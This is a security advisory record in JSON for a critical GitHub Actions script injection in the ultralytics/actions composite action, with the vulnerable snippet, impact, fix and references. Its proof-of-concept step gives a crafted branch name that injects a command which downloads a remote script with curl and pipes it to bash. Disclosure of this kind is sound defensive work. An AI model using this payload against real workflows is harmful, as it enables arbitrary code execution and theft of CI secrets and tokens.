{"id":"GHSA-7x29-qqmq-v6qc","aliases":[],"url":"https://o3.security/vulnerability/GHSA-7x29-qqmq-v6qc","summary":"GitHub Actions Script Injection in `ultralytics/actions`","details":"### Summary\n\nThe Ultralytics action available at https://github.com/marketplace/actions/ultralytics-actions is vulnerable to GitHub Actions script injection. If anyone uses the action within a workflow that runs on the `pull_request_target` trigger, then an attacker can inject arbitrary code into that workflow using a crafted branch name.\n\n### Details\n\nThe issue exists because the `action.yml` is a composite action and uses certain fields by GitHub context expression within a `run` step:\n\n```\n        echo \"github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}\"\n        echo \"github.ref: ${{ github.ref }}\"\n        echo \"github.head_ref: ${{ github.head_ref }}\"\n        echo \"github.base_ref: ${{ github.base_ref }}\"\n```\n\nIn this case, `github.head_ref` and `github.event.pull_request.head.ref` are user controlled and can be used to inject code.\n\n### PoC\n\n1. Create a fork of any repository that uses `ultralytics/actions` within a workflow that runs on `pull_request_target`.\n2. In the fork create a branch as an injection payload, e.g.: `Hacked\";{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/6dc549d083b2da1a54d22cc4feac53a4/raw/4b7499772c53085aeedf459d822aee277b5f17a0/poc.sh}${IFS}|${IFS}bash`\n\n3. Create a draft pull request.\n4. If the action is reachable, then achieve arbitrary code execution.\n\n![ultra_cve_poc](https://github.com/ultralytics/actions/assets/2006441/b865a54c-38b5-451c-8e93-c497ad6874a2)\n\nSee my full POC here (https://github.com/AdnaneKhan/Ultralytics_POC/actions/runs/9733997201 and https://github.com/AdnaneKhan/Ultralytics_POC), where I created a test workflow that used the action and achieved arbitrary execution using another account by creating a pull request from a fork.\n\n### Impact\n\nAny workflow that uses the action and runs on `pull_request_target` is vulnerable to arbitrary code execution within the context of the base branch. An attacker can use this to abuse the `GITHUB_TOKEN` or steal secrets from the workflow.\n\n### Fix\n\nSanitize the user-controlled variables using environment vars.","published":"2024-08-14T20:53:47Z","modified":"2026-02-04T03:00:05.114835Z","cvss":{"score":9.3,"severity":"CRITICAL","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N"},"epss":null,"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"GitHub Actions","name":"ultralytics/actions","fixedVersion":"0.0.3"}],"fix":{"url":"https://github.com/ultralytics/actions/commit/8069e0ac4c23170f308ea6985783e64ca4a7900a","label":"ultralytics/actions@8069e0a"},"references":[{"type":"WEB","url":"https://github.com/ultralytics/actions/security/advisories/GHSA-7x29-qqmq-v6qc"},{"type":"WEB","url":"https://github.com/ultralytics/actions/commit/8069e0ac4c23170f308ea6985783e64ca4a7900a"},{"type":"PACKAGE","url":"https://github.com/ultralytics/actions"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-02-04T03:00:05.114835Z"}}